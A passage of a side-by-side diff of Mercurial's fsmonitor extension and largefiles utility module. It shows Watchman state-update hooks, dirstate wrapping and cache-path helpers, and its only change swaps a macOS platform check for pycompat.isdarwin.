531 fout, ferr = self.ui.fout, self.ui.ferr
531 fout, ferr = self.ui.fout, self.ui.ferr
532 self.ui.fout = self.ui.ferr = open(os.devnull, 'wb')
532 self.ui.fout = self.ui.ferr = open(os.devnull, 'wb')
533
533
534 try:
534 try:
535 rv2 = orig(
535 rv2 = orig(
536 node1, node2, match, listignored, listclean, listunknown,
536 node1, node2, match, listignored, listclean, listunknown,
537 listsubrepos)
537 listsubrepos)
538 finally:
538 finally:
539 self.dirstate._fsmonitordisable = False
539 self.dirstate._fsmonitordisable = False
540 self.ui.quiet = quiet
540 self.ui.quiet = quiet
541 self.ui.fout, self.ui.ferr = fout, ferr
541 self.ui.fout, self.ui.ferr = fout, ferr
542
542
543 # clean isn't tested since it's set to True above
543 # clean isn't tested since it's set to True above
544 _cmpsets([modified, added, removed, deleted, unknown, ignored, clean],
544 _cmpsets([modified, added, removed, deleted, unknown, ignored, clean],
545 rv2)
545 rv2)
546 modified, added, removed, deleted, unknown, ignored, clean = rv2
546 modified, added, removed, deleted, unknown, ignored, clean = rv2
547
547
548 return scmutil.status(
548 return scmutil.status(
549 modified, added, removed, deleted, unknown, ignored, clean)
549 modified, added, removed, deleted, unknown, ignored, clean)
550
550
551 class poststatus(object):
551 class poststatus(object):
552 def __init__(self, startclock):
552 def __init__(self, startclock):
553 self._startclock = startclock
553 self._startclock = startclock
554
554
555 def __call__(self, wctx, status):
555 def __call__(self, wctx, status):
556 clock = wctx.repo()._fsmonitorstate.getlastclock() or self._startclock
556 clock = wctx.repo()._fsmonitorstate.getlastclock() or self._startclock
557 hashignore = _hashignore(wctx.repo().dirstate._ignore)
557 hashignore = _hashignore(wctx.repo().dirstate._ignore)
558 notefiles = (status.modified + status.added + status.removed +
558 notefiles = (status.modified + status.added + status.removed +
559 status.deleted + status.unknown)
559 status.deleted + status.unknown)
560 wctx.repo()._fsmonitorstate.set(clock, hashignore, notefiles)
560 wctx.repo()._fsmonitorstate.set(clock, hashignore, notefiles)
561
561
562 def makedirstate(repo, dirstate):
562 def makedirstate(repo, dirstate):
563 class fsmonitordirstate(dirstate.__class__):
563 class fsmonitordirstate(dirstate.__class__):
564 def _fsmonitorinit(self, repo):
564 def _fsmonitorinit(self, repo):
565 # _fsmonitordisable is used in paranoid mode
565 # _fsmonitordisable is used in paranoid mode
566 self._fsmonitordisable = False
566 self._fsmonitordisable = False
567 self._fsmonitorstate = repo._fsmonitorstate
567 self._fsmonitorstate = repo._fsmonitorstate
568 self._watchmanclient = repo._watchmanclient
568 self._watchmanclient = repo._watchmanclient
569 self._repo = weakref.proxy(repo)
569 self._repo = weakref.proxy(repo)
570
570
571 def walk(self, *args, **kwargs):
571 def walk(self, *args, **kwargs):
572 orig = super(fsmonitordirstate, self).walk
572 orig = super(fsmonitordirstate, self).walk
573 if self._fsmonitordisable:
573 if self._fsmonitordisable:
574 return orig(*args, **kwargs)
574 return orig(*args, **kwargs)
575 return overridewalk(orig, self, *args, **kwargs)
575 return overridewalk(orig, self, *args, **kwargs)
576
576
577 def rebuild(self, *args, **kwargs):
577 def rebuild(self, *args, **kwargs):
578 self._fsmonitorstate.invalidate()
578 self._fsmonitorstate.invalidate()
579 return super(fsmonitordirstate, self).rebuild(*args, **kwargs)
579 return super(fsmonitordirstate, self).rebuild(*args, **kwargs)
580
580
581 def invalidate(self, *args, **kwargs):
581 def invalidate(self, *args, **kwargs):
582 self._fsmonitorstate.invalidate()
582 self._fsmonitorstate.invalidate()
583 return super(fsmonitordirstate, self).invalidate(*args, **kwargs)
583 return super(fsmonitordirstate, self).invalidate(*args, **kwargs)
584
584
585 if dirstate._ui.configbool(
585 if dirstate._ui.configbool(
586 "experimental", "fsmonitor.wc_change_notify"):
586 "experimental", "fsmonitor.wc_change_notify"):
587 def setparents(self, p1, p2=nullid):
587 def setparents(self, p1, p2=nullid):
588 with state_update(self._repo, name="hg.wc_change",
588 with state_update(self._repo, name="hg.wc_change",
589 oldnode=self._pl[0], newnode=p1,
589 oldnode=self._pl[0], newnode=p1,
590 partial=False):
590 partial=False):
591 return super(fsmonitordirstate, self).setparents(p1, p2)
591 return super(fsmonitordirstate, self).setparents(p1, p2)
592
592
593 dirstate.__class__ = fsmonitordirstate
593 dirstate.__class__ = fsmonitordirstate
594 dirstate._fsmonitorinit(repo)
594 dirstate._fsmonitorinit(repo)
595
595
596 def wrapdirstate(orig, self):
596 def wrapdirstate(orig, self):
597 ds = orig(self)
597 ds = orig(self)
598 # only override the dirstate when Watchman is available for the repo
598 # only override the dirstate when Watchman is available for the repo
599 if util.safehasattr(self, '_fsmonitorstate'):
599 if util.safehasattr(self, '_fsmonitorstate'):
600 makedirstate(self, ds)
600 makedirstate(self, ds)
601 return ds
601 return ds
602
602
603 def extsetup(ui):
603 def extsetup(ui):
604 extensions.wrapfilecache(
604 extensions.wrapfilecache(
605 localrepo.localrepository, 'dirstate', wrapdirstate)
605 localrepo.localrepository, 'dirstate', wrapdirstate)
606 if pycompat.sysplatform == 'darwin':
606 if pycompat.isdarwin:
607 # An assist for avoiding the dangling-symlink fsevents bug
607 # An assist for avoiding the dangling-symlink fsevents bug
608 extensions.wrapfunction(os, 'symlink', wrapsymlink)
608 extensions.wrapfunction(os, 'symlink', wrapsymlink)
609
609
610 extensions.wrapfunction(merge, 'update', wrapupdate)
610 extensions.wrapfunction(merge, 'update', wrapupdate)
611
611
612 def wrapsymlink(orig, source, link_name):
612 def wrapsymlink(orig, source, link_name):
613 ''' if we create a dangling symlink, also touch the parent dir
613 ''' if we create a dangling symlink, also touch the parent dir
614 to encourage fsevents notifications to work more correctly '''
614 to encourage fsevents notifications to work more correctly '''
615 try:
615 try:
616 return orig(source, link_name)
616 return orig(source, link_name)
617 finally:
617 finally:
618 try:
618 try:
619 os.utime(os.path.dirname(link_name), None)
619 os.utime(os.path.dirname(link_name), None)
620 except OSError:
620 except OSError:
621 pass
621 pass
622
622
623 class state_update(object):
623 class state_update(object):
624 ''' This context manager is responsible for dispatching the state-enter
624 ''' This context manager is responsible for dispatching the state-enter
625 and state-leave signals to the watchman service. The enter and leave
625 and state-leave signals to the watchman service. The enter and leave
626 methods can be invoked manually (for scenarios where context manager
626 methods can be invoked manually (for scenarios where context manager
627 semantics are not possible). If parameters oldnode and newnode are None,
627 semantics are not possible). If parameters oldnode and newnode are None,
628 they will be populated based on current working copy in enter and
628 they will be populated based on current working copy in enter and
629 leave, respectively. Similarly, if the distance is none, it will be
629 leave, respectively. Similarly, if the distance is none, it will be
630 calculated based on the oldnode and newnode in the leave method.'''
630 calculated based on the oldnode and newnode in the leave method.'''
631
631
632 def __init__(self, repo, name, oldnode=None, newnode=None, distance=None,
632 def __init__(self, repo, name, oldnode=None, newnode=None, distance=None,
633 partial=False):
633 partial=False):
634 self.repo = repo.unfiltered()
634 self.repo = repo.unfiltered()
635 self.name = name
635 self.name = name
636 self.oldnode = oldnode
636 self.oldnode = oldnode
637 self.newnode = newnode
637 self.newnode = newnode
638 self.distance = distance
638 self.distance = distance
639 self.partial = partial
639 self.partial = partial
640 self._lock = None
640 self._lock = None
641 self.need_leave = False
641 self.need_leave = False
642
642
643 def __enter__(self):
643 def __enter__(self):
644 self.enter()
644 self.enter()
645
645
646 def enter(self):
646 def enter(self):
647 # We explicitly need to take a lock here, before we proceed to update
647 # We explicitly need to take a lock here, before we proceed to update
648 # watchman about the update operation, so that we don't race with
648 # watchman about the update operation, so that we don't race with
649 # some other actor. merge.update is going to take the wlock almost
649 # some other actor. merge.update is going to take the wlock almost
650 # immediately anyway, so this is effectively extending the lock
650 # immediately anyway, so this is effectively extending the lock
651 # around a couple of short sanity checks.
651 # around a couple of short sanity checks.
652 if self.oldnode is None:
652 if self.oldnode is None:
653 self.oldnode = self.repo['.'].node()
653 self.oldnode = self.repo['.'].node()
654 self._lock = self.repo.wlock()
654 self._lock = self.repo.wlock()
655 self.need_leave = self._state(
655 self.need_leave = self._state(
656 'state-enter',
656 'state-enter',
657 hex(self.oldnode))
657 hex(self.oldnode))
658 return self
658 return self
659
659
660 def __exit__(self, type_, value, tb):
660 def __exit__(self, type_, value, tb):
661 abort = True if type_ else False
661 abort = True if type_ else False
662 self.exit(abort=abort)
662 self.exit(abort=abort)
663
663
664 def exit(self, abort=False):
664 def exit(self, abort=False):
665 try:
665 try:
666 if self.need_leave:
666 if self.need_leave:
667 status = 'failed' if abort else 'ok'
667 status = 'failed' if abort else 'ok'
668 if self.newnode is None:
668 if self.newnode is None:
669 self.newnode = self.repo['.'].node()
669 self.newnode = self.repo['.'].node()
670 if self.distance is None:
670 if self.distance is None:
671 self.distance = calcdistance(
671 self.distance = calcdistance(
672 self.repo, self.oldnode, self.newnode)
672 self.repo, self.oldnode, self.newnode)
673 self._state(
673 self._state(
674 'state-leave',
674 'state-leave',
675 hex(self.newnode),
675 hex(self.newnode),
676 status=status)
676 status=status)
677 finally:
677 finally:
678 self.need_leave = False
678 self.need_leave = False
679 if self._lock:
679 if self._lock:
680 self._lock.release()
680 self._lock.release()
681
681
682 def _state(self, cmd, commithash, status='ok'):
682 def _state(self, cmd, commithash, status='ok'):
683 if not util.safehasattr(self.repo, '_watchmanclient'):
683 if not util.safehasattr(self.repo, '_watchmanclient'):
684 return False
684 return False
685 try:
685 try:
686 self.repo._watchmanclient.command(cmd, {
686 self.repo._watchmanclient.command(cmd, {
687 'name': self.name,
687 'name': self.name,
688 'metadata': {
688 'metadata': {
689 # the target revision
689 # the target revision
690 'rev': commithash,
690 'rev': commithash,
691 # approximate number of commits between current and target
691 # approximate number of commits between current and target
692 'distance': self.distance if self.distance else 0,
692 'distance': self.distance if self.distance else 0,
693 # success/failure (only really meaningful for state-leave)
693 # success/failure (only really meaningful for state-leave)
694 'status': status,
694 'status': status,
695 # whether the working copy parent is changing
695 # whether the working copy parent is changing
696 'partial': self.partial,
696 'partial': self.partial,
697 }})
697 }})
698 return True
698 return True
699 except Exception as e:
699 except Exception as e:
700 # Swallow any errors; fire and forget
700 # Swallow any errors; fire and forget
701 self.repo.ui.log(
701 self.repo.ui.log(
702 'watchman', 'Exception %s while running %s\n', e, cmd)
702 'watchman', 'Exception %s while running %s\n', e, cmd)
703 return False
703 return False
704
704
705 # Estimate the distance between two nodes
705 # Estimate the distance between two nodes
706 def calcdistance(repo, oldnode, newnode):
706 def calcdistance(repo, oldnode, newnode):
707 anc = repo.changelog.ancestor(oldnode, newnode)
707 anc = repo.changelog.ancestor(oldnode, newnode)
708 ancrev = repo[anc].rev()
708 ancrev = repo[anc].rev()
709 distance = (abs(repo[oldnode].rev() - ancrev)
709 distance = (abs(repo[oldnode].rev() - ancrev)
710 + abs(repo[newnode].rev() - ancrev))
710 + abs(repo[newnode].rev() - ancrev))
711 return distance
711 return distance
712
712
713 # Bracket working copy updates with calls to the watchman state-enter
713 # Bracket working copy updates with calls to the watchman state-enter
714 # and state-leave commands. This allows clients to perform more intelligent
714 # and state-leave commands. This allows clients to perform more intelligent
715 # settling during bulk file change scenarios
715 # settling during bulk file change scenarios
716 # https://facebook.github.io/watchman/docs/cmd/subscribe.html#advanced-settling
716 # https://facebook.github.io/watchman/docs/cmd/subscribe.html#advanced-settling
717 def wrapupdate(orig, repo, node, branchmerge, force, ancestor=None,
717 def wrapupdate(orig, repo, node, branchmerge, force, ancestor=None,
718 mergeancestor=False, labels=None, matcher=None, **kwargs):
718 mergeancestor=False, labels=None, matcher=None, **kwargs):
719
719
720 distance = 0
720 distance = 0
721 partial = True
721 partial = True
722 oldnode = repo['.'].node()
722 oldnode = repo['.'].node()
723 newnode = repo[node].node()
723 newnode = repo[node].node()
724 if matcher is None or matcher.always():
724 if matcher is None or matcher.always():
725 partial = False
725 partial = False
726 distance = calcdistance(repo.unfiltered(), oldnode, newnode)
726 distance = calcdistance(repo.unfiltered(), oldnode, newnode)
727
727
728 with state_update(repo, name="hg.update", oldnode=oldnode, newnode=newnode,
728 with state_update(repo, name="hg.update", oldnode=oldnode, newnode=newnode,
729 distance=distance, partial=partial):
729 distance=distance, partial=partial):
730 return orig(
730 return orig(
731 repo, node, branchmerge, force, ancestor, mergeancestor,
731 repo, node, branchmerge, force, ancestor, mergeancestor,
732 labels, matcher, **kwargs)
732 labels, matcher, **kwargs)
733
733
734 def reposetup(ui, repo):
734 def reposetup(ui, repo):
735 # We don't work with largefiles or inotify
735 # We don't work with largefiles or inotify
736 exts = extensions.enabled()
736 exts = extensions.enabled()
737 for ext in _blacklist:
737 for ext in _blacklist:
738 if ext in exts:
738 if ext in exts:
739 ui.warn(_('The fsmonitor extension is incompatible with the %s '
739 ui.warn(_('The fsmonitor extension is incompatible with the %s '
740 'extension and has been disabled.\n') % ext)
740 'extension and has been disabled.\n') % ext)
741 return
741 return
742
742
743 if repo.local():
743 if repo.local():
744 # We don't work with subrepos either.
744 # We don't work with subrepos either.
745 #
745 #
746 # if repo[None].substate can cause a dirstate parse, which is too
746 # if repo[None].substate can cause a dirstate parse, which is too
747 # slow. Instead, look for a file called hgsubstate,
747 # slow. Instead, look for a file called hgsubstate,
748 if repo.wvfs.exists('.hgsubstate') or repo.wvfs.exists('.hgsub'):
748 if repo.wvfs.exists('.hgsubstate') or repo.wvfs.exists('.hgsub'):
749 return
749 return
750
750
751 fsmonitorstate = state.state(repo)
751 fsmonitorstate = state.state(repo)
752 if fsmonitorstate.mode == 'off':
752 if fsmonitorstate.mode == 'off':
753 return
753 return
754
754
755 try:
755 try:
756 client = watchmanclient.client(repo)
756 client = watchmanclient.client(repo)
757 except Exception as ex:
757 except Exception as ex:
758 _handleunavailable(ui, fsmonitorstate, ex)
758 _handleunavailable(ui, fsmonitorstate, ex)
759 return
759 return
760
760
761 repo._fsmonitorstate = fsmonitorstate
761 repo._fsmonitorstate = fsmonitorstate
762 repo._watchmanclient = client
762 repo._watchmanclient = client
763
763
764 dirstate, cached = localrepo.isfilecached(repo, 'dirstate')
764 dirstate, cached = localrepo.isfilecached(repo, 'dirstate')
765 if cached:
765 if cached:
766 # at this point since fsmonitorstate wasn't present,
766 # at this point since fsmonitorstate wasn't present,
767 # repo.dirstate is not a fsmonitordirstate
767 # repo.dirstate is not a fsmonitordirstate
768 makedirstate(repo, dirstate)
768 makedirstate(repo, dirstate)
769
769
770 class fsmonitorrepo(repo.__class__):
770 class fsmonitorrepo(repo.__class__):
771 def status(self, *args, **kwargs):
771 def status(self, *args, **kwargs):
772 orig = super(fsmonitorrepo, self).status
772 orig = super(fsmonitorrepo, self).status
773 return overridestatus(orig, self, *args, **kwargs)
773 return overridestatus(orig, self, *args, **kwargs)
774
774
775 if ui.configbool("experimental", "fsmonitor.transaction_notify"):
775 if ui.configbool("experimental", "fsmonitor.transaction_notify"):
776 def transaction(self, *args, **kwargs):
776 def transaction(self, *args, **kwargs):
777 tr = super(fsmonitorrepo, self).transaction(
777 tr = super(fsmonitorrepo, self).transaction(
778 *args, **kwargs)
778 *args, **kwargs)
779 if tr.count != 1:
779 if tr.count != 1:
780 return tr
780 return tr
781 stateupdate = state_update(self, name="hg.transaction")
781 stateupdate = state_update(self, name="hg.transaction")
782 stateupdate.enter()
782 stateupdate.enter()
783
783
784 class fsmonitortrans(tr.__class__):
784 class fsmonitortrans(tr.__class__):
785 def _abort(self):
785 def _abort(self):
786 try:
786 try:
787 result = super(fsmonitortrans, self)._abort()
787 result = super(fsmonitortrans, self)._abort()
788 finally:
788 finally:
789 stateupdate.exit(abort=True)
789 stateupdate.exit(abort=True)
790 return result
790 return result
791
791
792 def close(self):
792 def close(self):
793 try:
793 try:
794 result = super(fsmonitortrans, self).close()
794 result = super(fsmonitortrans, self).close()
795 finally:
795 finally:
796 if self.count == 0:
796 if self.count == 0:
797 stateupdate.exit()
797 stateupdate.exit()
798 return result
798 return result
799
799
800 tr.__class__ = fsmonitortrans
800 tr.__class__ = fsmonitortrans
801 return tr
801 return tr
802
802
803 repo.__class__ = fsmonitorrepo
803 repo.__class__ = fsmonitorrepo
@@ -1,673 +1,673 b''
1 # Copyright 2009-2010 Gregory P. Ward
1 # Copyright 2009-2010 Gregory P. Ward
2 # Copyright 2009-2010 Intelerad Medical Systems Incorporated
2 # Copyright 2009-2010 Intelerad Medical Systems Incorporated
3 # Copyright 2010-2011 Fog Creek Software
3 # Copyright 2010-2011 Fog Creek Software
4 # Copyright 2010-2011 Unity Technologies
4 # Copyright 2010-2011 Unity Technologies
5 #
5 #
6 # This software may be used and distributed according to the terms of the
6 # This software may be used and distributed according to the terms of the
7 # GNU General Public License version 2 or any later version.
7 # GNU General Public License version 2 or any later version.
8
8
9 '''largefiles utility code: must not import other modules in this package.'''
9 '''largefiles utility code: must not import other modules in this package.'''
10 from __future__ import absolute_import
10 from __future__ import absolute_import
11
11
12 import copy
12 import copy
13 import hashlib
13 import hashlib
14 import os
14 import os
15 import stat
15 import stat
16
16
17 from mercurial.i18n import _
17 from mercurial.i18n import _
18
18
19 from mercurial import (
19 from mercurial import (
20 dirstate,
20 dirstate,
21 encoding,
21 encoding,
22 error,
22 error,
23 httpconnection,
23 httpconnection,
24 match as matchmod,
24 match as matchmod,
25 node,
25 node,
26 pycompat,
26 pycompat,
27 scmutil,
27 scmutil,
28 sparse,
28 sparse,
29 util,
29 util,
30 vfs as vfsmod,
30 vfs as vfsmod,
31 )
31 )
32
32
33 shortname = '.hglf'
33 shortname = '.hglf'
34 shortnameslash = shortname + '/'
34 shortnameslash = shortname + '/'
35 longname = 'largefiles'
35 longname = 'largefiles'
36
36
37 # -- Private worker functions ------------------------------------------
37 # -- Private worker functions ------------------------------------------
38
38
39 def getminsize(ui, assumelfiles, opt, default=10):
39 def getminsize(ui, assumelfiles, opt, default=10):
40 lfsize = opt
40 lfsize = opt
41 if not lfsize and assumelfiles:
41 if not lfsize and assumelfiles:
42 lfsize = ui.config(longname, 'minsize', default=default)
42 lfsize = ui.config(longname, 'minsize', default=default)
43 if lfsize:
43 if lfsize:
44 try:
44 try:
45 lfsize = float(lfsize)
45 lfsize = float(lfsize)
46 except ValueError:
46 except ValueError:
47 raise error.Abort(_('largefiles: size must be number (not %s)\n')
47 raise error.Abort(_('largefiles: size must be number (not %s)\n')
48 % lfsize)
48 % lfsize)
49 if lfsize is None:
49 if lfsize is None:
50 raise error.Abort(_('minimum size for largefiles must be specified'))
50 raise error.Abort(_('minimum size for largefiles must be specified'))
51 return lfsize
51 return lfsize
52
52
53 def link(src, dest):
53 def link(src, dest):
54 """Try to create hardlink - if that fails, efficiently make a copy."""
54 """Try to create hardlink - if that fails, efficiently make a copy."""
55 util.makedirs(os.path.dirname(dest))
55 util.makedirs(os.path.dirname(dest))
56 try:
56 try:
57 util.oslink(src, dest)
57 util.oslink(src, dest)
58 except OSError:
58 except OSError:
59 # if hardlinks fail, fallback on atomic copy
59 # if hardlinks fail, fallback on atomic copy
60 with open(src, 'rb') as srcf, util.atomictempfile(dest) as dstf:
60 with open(src, 'rb') as srcf, util.atomictempfile(dest) as dstf:
61 for chunk in util.filechunkiter(srcf):
61 for chunk in util.filechunkiter(srcf):
62 dstf.write(chunk)
62 dstf.write(chunk)
63 os.chmod(dest, os.stat(src).st_mode)
63 os.chmod(dest, os.stat(src).st_mode)
64
64
65 def usercachepath(ui, hash):
65 def usercachepath(ui, hash):
66 '''Return the correct location in the "global" largefiles cache for a file
66 '''Return the correct location in the "global" largefiles cache for a file
67 with the given hash.
67 with the given hash.
68 This cache is used for sharing of largefiles across repositories - both
68 This cache is used for sharing of largefiles across repositories - both
69 to preserve download bandwidth and storage space.'''
69 to preserve download bandwidth and storage space.'''
70 return os.path.join(_usercachedir(ui), hash)
70 return os.path.join(_usercachedir(ui), hash)
71
71
72 def _usercachedir(ui):
72 def _usercachedir(ui):
73 '''Return the location of the "global" largefiles cache.'''
73 '''Return the location of the "global" largefiles cache.'''
74 path = ui.configpath(longname, 'usercache', None)
74 path = ui.configpath(longname, 'usercache', None)
75 if path:
75 if path:
76 return path
76 return path
77 if pycompat.iswindows:
77 if pycompat.iswindows:
78 appdata = encoding.environ.get('LOCALAPPDATA',\
78 appdata = encoding.environ.get('LOCALAPPDATA',\
79 encoding.environ.get('APPDATA'))
79 encoding.environ.get('APPDATA'))
80 if appdata:
80 if appdata:
81 return os.path.join(appdata, longname)
81 return os.path.join(appdata, longname)
82 elif pycompat.sysplatform == 'darwin':
82 elif pycompat.isdarwin:
83 home = encoding.environ.get('HOME')
83 home = encoding.environ.get('HOME')
84 if home:
84 if home:
85 return os.path.join(home, 'Library', 'Caches', longname)
85 return os.path.join(home, 'Library', 'Caches', longname)
86 elif pycompat.isposix:
86 elif pycompat.isposix:
87 path = encoding.environ.get('XDG_CACHE_HOME')
87 path = encoding.environ.get('XDG_CACHE_HOME')
88 if path:
88 if path:
89 return os.path.join(path, longname)
89 return os.path.join(path, longname)
90 home = encoding.environ.get('HOME')
90 home = encoding.environ.get('HOME')
91 if home:
91 if home:
92 return os.path.join(home, '.cache', longname)
92 return os.path.join(home, '.cache', longname)
93 else:
93 else:
94 raise error.Abort(_('unknown operating system: %s\n')
94 raise error.Abort(_('unknown operating system: %s\n')
95 % pycompat.osname)
95 % pycompat.osname)
96 raise error.Abort(_('unknown %s usercache location') % longname)
96 raise error.Abort(_('unknown %s usercache location') % longname)
97
97
98 def inusercache(ui, hash):
98 def inusercache(ui, hash):
99 path = usercachepath(ui, hash)
99 path = usercachepath(ui, hash)
100 return os.path.exists(path)
100 return os.path.exists(path)
101
101
102 def findfile(repo, hash):
102 def findfile(repo, hash):
103 '''Return store path of the largefile with the specified hash.
103 '''Return store path of the largefile with the specified hash.
104 As a side effect, the file might be linked from user cache.
104 As a side effect, the file might be linked from user cache.
105 Return None if the file can't be found locally.'''
105 Return None if the file can't be found locally.'''
106 path, exists = findstorepath(repo, hash)
106 path, exists = findstorepath(repo, hash)
107 if exists:
107 if exists:
108 repo.ui.note(_('found %s in store\n') % hash)
108 repo.ui.note(_('found %s in store\n') % hash)
109 return path
109 return path
110 elif inusercache(repo.ui, hash):
110 elif inusercache(repo.ui, hash):
111 repo.ui.note(_('found %s in system cache\n') % hash)
111 repo.ui.note(_('found %s in system cache\n') % hash)
112 path = storepath(repo, hash)
112 path = storepath(repo, hash)
113 link(usercachepath(repo.ui, hash), path)
113 link(usercachepath(repo.ui, hash), path)
114 return path
114 return path
115 return None
115 return None
116
116
117 class largefilesdirstate(dirstate.dirstate):
117 class largefilesdirstate(dirstate.dirstate):
118 def __getitem__(self, key):
118 def __getitem__(self, key):
119 return super(largefilesdirstate, self).__getitem__(unixpath(key))
119 return super(largefilesdirstate, self).__getitem__(unixpath(key))
120 def normal(self, f):
120 def normal(self, f):
121 return super(largefilesdirstate, self).normal(unixpath(f))
121 return super(largefilesdirstate, self).normal(unixpath(f))
122 def remove(self, f):
122 def remove(self, f):
123 return super(largefilesdirstate, self).remove(unixpath(f))
123 return super(largefilesdirstate, self).remove(unixpath(f))
124 def add(self, f):
124 def add(self, f):
125 return super(largefilesdirstate, self).add(unixpath(f))
125 return super(largefilesdirstate, self).add(unixpath(f))
126 def drop(self, f):
126 def drop(self, f):
127 return super(largefilesdirstate, self).drop(unixpath(f))
127 return super(largefilesdirstate, self).drop(unixpath(f))
128 def forget(self, f):
128 def forget(self, f):
129 return super(largefilesdirstate, self).forget(unixpath(f))
129 return super(largefilesdirstate, self).forget(unixpath(f))
130 def normallookup(self, f):
130 def normallookup(self, f):
131 return super(largefilesdirstate, self).normallookup(unixpath(f))
131 return super(largefilesdirstate, self).normallookup(unixpath(f))
132 def _ignore(self, f):
132 def _ignore(self, f):
133 return False
133 return False
134 def write(self, tr=False):
134 def write(self, tr=False):
135 # (1) disable PENDING mode always
135 # (1) disable PENDING mode always
136 # (lfdirstate isn't yet managed as a part of the transaction)
136 # (lfdirstate isn't yet managed as a part of the transaction)
137 # (2) avoid develwarn 'use dirstate.write with ....'
137 # (2) avoid develwarn 'use dirstate.write with ....'
138 super(largefilesdirstate, self).write(None)
138 super(largefilesdirstate, self).write(None)
139
139
140 def openlfdirstate(ui, repo, create=True):
140 def openlfdirstate(ui, repo, create=True):
141 '''
141 '''
142 Return a dirstate object that tracks largefiles: i.e. its root is
142 Return a dirstate object that tracks largefiles: i.e. its root is
143 the repo root, but it is saved in .hg/largefiles/dirstate.
143 the repo root, but it is saved in .hg/largefiles/dirstate.
144 '''
144 '''
145 vfs = repo.vfs
145 vfs = repo.vfs
146 lfstoredir = longname
146 lfstoredir = longname
147 opener = vfsmod.vfs(vfs.join(lfstoredir))
147 opener = vfsmod.vfs(vfs.join(lfstoredir))
148 lfdirstate = largefilesdirstate(opener, ui, repo.root,
148 lfdirstate = largefilesdirstate(opener, ui, repo.root,
149 repo.dirstate._validate,
149 repo.dirstate._validate,
150 lambda: sparse.matcher(repo))
150 lambda: sparse.matcher(repo))
151
151
152 # If the largefiles dirstate does not exist, populate and create
152 # If the largefiles dirstate does not exist, populate and create
153 # it. This ensures that we create it on the first meaningful
153 # it. This ensures that we create it on the first meaningful
154 # largefiles operation in a new clone.
154 # largefiles operation in a new clone.
155 if create and not vfs.exists(vfs.join(lfstoredir, 'dirstate')):
155 if create and not vfs.exists(vfs.join(lfstoredir, 'dirstate')):
156 matcher = getstandinmatcher(repo)
156 matcher = getstandinmatcher(repo)
157 standins = repo.dirstate.walk(matcher, subrepos=[], unknown=False,
157 standins = repo.dirstate.walk(matcher, subrepos=[], unknown=False,
158 ignored=False)
158 ignored=False)
159
159
160 if len(standins) > 0:
160 if len(standins) > 0:
161 vfs.makedirs(lfstoredir)
161 vfs.makedirs(lfstoredir)
162
162
163 for standin in standins:
163 for standin in standins:
164 lfile = splitstandin(standin)
164 lfile = splitstandin(standin)
165 lfdirstate.normallookup(lfile)
165 lfdirstate.normallookup(lfile)
166 return lfdirstate
166 return lfdirstate
167
167
168 def lfdirstatestatus(lfdirstate, repo):
168 def lfdirstatestatus(lfdirstate, repo):
169 pctx = repo['.']
169 pctx = repo['.']
170 match = matchmod.always(repo.root, repo.getcwd())
170 match = matchmod.always(repo.root, repo.getcwd())
171 unsure, s = lfdirstate.status(match, subrepos=[], ignored=False,
171 unsure, s = lfdirstate.status(match, subrepos=[], ignored=False,
172 clean=False, unknown=False)
172 clean=False, unknown=False)
173 modified, clean = s.modified, s.clean
173 modified, clean = s.modified, s.clean
174 for lfile in unsure:
174 for lfile in unsure:
175 try:
175 try:
176 fctx = pctx[standin(lfile)]
176 fctx = pctx[standin(lfile)]
177 except LookupError:
177 except LookupError:
178 fctx = None
178 fctx = None
179 if not fctx or readasstandin(fctx) != hashfile(repo.wjoin(lfile)):
179 if not fctx or readasstandin(fctx) != hashfile(repo.wjoin(lfile)):
180 modified.append(lfile)
180 modified.append(lfile)
181 else:
181 else:
182 clean.append(lfile)
182 clean.append(lfile)
183 lfdirstate.normal(lfile)
183 lfdirstate.normal(lfile)
184 return s
184 return s
185
185
186 def listlfiles(repo, rev=None, matcher=None):
186 def listlfiles(repo, rev=None, matcher=None):
187 '''return a list of largefiles in the working copy or the
187 '''return a list of largefiles in the working copy or the
188 specified changeset'''
188 specified changeset'''
189
189
190 if matcher is None:
190 if matcher is None:
191 matcher = getstandinmatcher(repo)
191 matcher = getstandinmatcher(repo)
192
192
193 # ignore unknown files in working directory
193 # ignore unknown files in working directory
194 return [splitstandin(f)
194 return [splitstandin(f)
195 for f in repo[rev].walk(matcher)
195 for f in repo[rev].walk(matcher)
196 if rev is not None or repo.dirstate[f] != '?']
196 if rev is not None or repo.dirstate[f] != '?']
197
197
198 def instore(repo, hash, forcelocal=False):
198 def instore(repo, hash, forcelocal=False):
199 '''Return true if a largefile with the given hash exists in the store'''
199 '''Return true if a largefile with the given hash exists in the store'''
200 return os.path.exists(storepath(repo, hash, forcelocal))
200 return os.path.exists(storepath(repo, hash, forcelocal))
201
201
202 def storepath(repo, hash, forcelocal=False):
202 def storepath(repo, hash, forcelocal=False):
203 '''Return the correct location in the repository largefiles store for a
203 '''Return the correct location in the repository largefiles store for a
204 file with the given hash.'''
204 file with the given hash.'''
205 if not forcelocal and repo.shared():
205 if not forcelocal and repo.shared():
206 return repo.vfs.reljoin(repo.sharedpath, longname, hash)
206 return repo.vfs.reljoin(repo.sharedpath, longname, hash)
207 return repo.vfs.join(longname, hash)
207 return repo.vfs.join(longname, hash)
208
208
209 def findstorepath(repo, hash):
209 def findstorepath(repo, hash):
210 '''Search through the local store path(s) to find the file for the given
210 '''Search through the local store path(s) to find the file for the given
211 hash. If the file is not found, its path in the primary store is returned.
211 hash. If the file is not found, its path in the primary store is returned.
212 The return value is a tuple of (path, exists(path)).
212 The return value is a tuple of (path, exists(path)).
213 '''
213 '''
214 # For shared repos, the primary store is in the share source. But for
214 # For shared repos, the primary store is in the share source. But for
215 # backward compatibility, force a lookup in the local store if it wasn't
215 # backward compatibility, force a lookup in the local store if it wasn't
216 # found in the share source.
216 # found in the share source.
217 path = storepath(repo, hash, False)
217 path = storepath(repo, hash, False)
218
218
219 if instore(repo, hash):
219 if instore(repo, hash):
220 return (path, True)
220 return (path, True)
221 elif repo.shared() and instore(repo, hash, True):
221 elif repo.shared() and instore(repo, hash, True):
222 return storepath(repo, hash, True), True
222 return storepath(repo, hash, True), True
223
223
224 return (path, False)
224 return (path, False)
225
225
226 def copyfromcache(repo, hash, filename):
226 def copyfromcache(repo, hash, filename):
227 '''Copy the specified largefile from the repo or system cache to
227 '''Copy the specified largefile from the repo or system cache to
228 filename in the repository. Return true on success or false if the
228 filename in the repository. Return true on success or false if the
229 file was not found in either cache (which should not happened:
229 file was not found in either cache (which should not happened:
230 this is meant to be called only after ensuring that the needed
230 this is meant to be called only after ensuring that the needed
231 largefile exists in the cache).'''
231 largefile exists in the cache).'''
232 wvfs = repo.wvfs
